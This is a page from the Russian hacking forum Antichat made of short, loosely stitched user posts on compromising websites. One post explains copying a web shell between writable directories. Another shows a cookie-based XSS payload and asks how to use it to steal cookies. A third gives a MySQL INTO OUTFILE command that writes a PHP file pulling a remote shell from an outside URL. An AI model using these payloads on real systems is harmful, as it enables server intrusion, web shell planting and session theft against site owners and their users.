ANTICHAT — форум по информационной безопасности, OSINT и технологиям

полезно знать команды никсовые.

например вот такие ls -la и cp при удачном стечении обстоятельств можно скопировать с одного места шел в другое. (те в тут да где есть доступ из веб и имеются права на запись.)
ps ето если те нужно попасть на другой сайт на томже серве но он находится в другой дире.

https://forum.antichat.net/thread148119.html

Здравствуйте.
На сайте есть изменение цвета скина. "Переменная" берется через куки. Т.е. color: green стоит. Если же поставить color: "><script>alert()</script>, то прекрасно срабатывает.
Есть возможность через другой локальный сайт установить для домена сайта, на котором есть уязвимость, куки с xss (или css, точно не знаю).
Возможно ли как-нибудь использовать данную уязвимость, чтобы украсть куки или что-либо другое помимо простого алерта?

а есть online converter для изменения char => hex ??

Например, вот .

http://x3k.ru/

а моjно заливать shell из phpmyadmin-a ??

SELECT '<? @include("http://www.site.com/shell.txt"); ?>' into outfile '/абсолютный путь/shel.php';

я знаю ету ну не нащел полнуы путь..и поетому из пхпмядмина хо4у заливат shell//